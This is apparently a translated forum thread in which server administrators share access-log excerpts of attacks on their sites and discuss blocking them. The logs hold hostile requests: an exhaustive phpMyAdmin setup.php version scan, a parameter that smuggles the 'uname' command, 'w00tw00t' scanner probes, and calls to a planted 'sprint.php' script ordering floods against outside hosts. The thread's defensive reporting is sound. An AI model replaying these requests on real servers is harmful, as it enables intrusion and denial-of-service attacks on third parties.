66.249.67.73 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/AdbeRdr70_kor_full.exe HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html )"
66.249.69.28 - - [05/May/2011:20:52:25 +0900] "GET /upload/viewer_board/Hunv2k.exe HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; 
Googlebot/2.1; +http://www.google.com/bot.html )"

A KENTWEB CGI that I deleted a year ago still gets dozens of hits every day.
Both the Apache access log and the error log are full of 404s and "File does not exist" error messages lol
I think it's an IP-distributed SEO outfit, but they fire off ads while randomly changing IPs, so even with a script that registers each one in iptables it's a complete waste of resources.
I automatically register any IP that accesses the specified address (the deleted CGI) to be DROPped, but it has passed 9,000 entries, and I'm starting to feel that the memory I spend feeding them to iptables is what's being wasted.
Lately they've even been kind enough to set a referrer when they hit me. I'll kill you lololol
http://link.iclub.to/0791597/
http://link.iclub.to/0933/
http://link.iclub.to/13571357/
http://link.iclub.to/nasato/
http://link.iclub.to/neko38/
http://link2.iclub.to/0762609/
http://link3.iclub.to/2264770/
http://link3.iclub.to/2889785/
http://link3.iclub.to/36912/
http://link4.iclub.to/kabu/
http://link6.iclub.to/uru80ta/

113.33.224.197
I got an FTP attack from this one. I have Remote Desktop open; is that going to be OK?

208.51.40.50
This one was port-scanning me the whole time.
When I looked up this IP address I ended up at what looks like a Chinese newspaper (?) site; I wonder if it has been cracked.

85.25.131.109 - - [16/Jun/2011:03:21:39 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 404 385 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0"
Lately I've been getting requests for Y-ivrrecording.php about every three days.
I don't have any such file, though.

This one is hitting me right now:
66.241.100.228
Same content as >>61

219.135.253.80(80.253.135.219.broad.gz.gd.dynamic.163data.com.cn)
From China. It was trying to log in to FTP as Administrator.

114.173.176.253 p17253-ipngn100102okayamaima.okayama.ocn.ne.jp
114.174.207.4 p12004-ipngn100105osakakita.osaka.ocn.ne.jp
114.174.253.34 p14034-ipngn100108osakakita.osaka.ocn.ne.jp
114.173.15.191 p12191-ipngn100403kobeminato.hyogo.ocn.ne.jp
114.173.137.79 p18079-ipngn100204niho.hiroshima.ocn.ne.jp
They try to connect to TCP 445 20 to 30 times a day.
It's getting annoying.

I get about 50 to 120 attacks on FTP a day.
I'm knocking them down with swatch, though.

Is this what the next thread's title will be?
A thread to expose the IPs that pulled an Attack No. 2

I couldn't find a more suitable place, so here goes. Recently,
125.175.54.138 - - [15/Jul/2011:03:32:55 +0900] "GET /you/new.htm HTTP/1.1" 200 55472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:02 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑
... and it goes on and on ...
log entries like these have started to catch my eye. The source IP is inside Japan.
The URL being requested is a valid one, but there are no requests for the images embedded in the page; only this page is fetched over and over. No referer either.
As a distinguishing trait, the requests always come in a batch of three, and the next batch comes 100 to 200 seconds later.
... What could this be?

31.25.136.18 - - [21/Jun/2011:19:48:48 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 403 1506
193.227.186.153 - - [21/Jun/2011:14:05:16 +0900] "GET /admin/config.php HTTP/1.1" 403 1506
These two PHP files have been getting a lot of requests lately.
Even though I don't have them.
I'm rejecting requests from JP or from HOSTs that can't be reverse-resolved, but I wonder if it would be better to return 404.

>>80
Judging from the URL, is it a page where you post update news or something?
If so, I think the access is for scraping.
I don't know what the page actually is, so this is a guess, but I think there's probably no malice.
>>81
That kind of thing is a bot, so returning 404 is pointless.

>>82
It is update news, and there's similar access to the links page as well.
Maybe, surprisingly, a program that sprays referer spam is running,
but security software is stripping the referer or something...
But referer spam behaves a little differently.

I think the intervals are too regular for referrer spam...
Try changing the HTML structure and watch what happens:
see whether the pace breaks down, or whether there are traces of someone accessing it by hand.

68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //scripts/setup.php HTTP/1.1" 404 215 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //admin/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 225 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //db/scripts/setup.php HTTP/1.1" 404 218 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 219 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 230 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //web/scripts/setup.php HTTP/1.1" 404 219 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - 
[30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 
- - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 
68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 
238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1" 404 235 "-" 
"-" 68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.3.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.4.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.5.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.6.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.1/scripts/setup.php HTTP/1.1" 404 
235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.8.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.9.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.3/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-2.11.9.4/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.0.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.3.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.1" 404 234 
"-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //p/m/a/scripts/setup.php HTTP/1.1" 404 221 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //PMA2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2006/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2007/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2008/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2009/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //webadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //sqlweb/scripts/setup.php HTTP/1.1" 404 222 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-" 68.169.42.240 - - 
[30/Jul/2011:23:35:35 +0900] "GET //webdb/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admm/scripts/setup.php HTTP/1.1" 404 220 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admn/scripts/setup.php HTTP/1.1" 404 220 "-" "-"
Looks like it's hunting for every phpMyAdmin version ever released.

>>93 Are you stupid? Read the thread title out loud 100 times.

>>85-92 is a lot of text, but it also shows clearly how the attack came in. So it has value and there is no problem with it.

This isn't an attack from outside, but... there is a BIND thread, but there didn't seem to be a thread for DNS in general (did it go away?), so I'm posting here.
My logs show a PC on our premises sending the DNS cache queries of the form
<random string>.<domain returned by DHCP>
three times in a row...
Some days it does this several times, other days it doesn't do it at all.
I don't know what triggers it either.
NXDOMAIN comes back, of course, but it doesn't look like Kaminsky either.
There's no real harm so far, but it's a bit creepy.
Does anyone know anything about this?
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:36 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:39 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:40 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-

79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
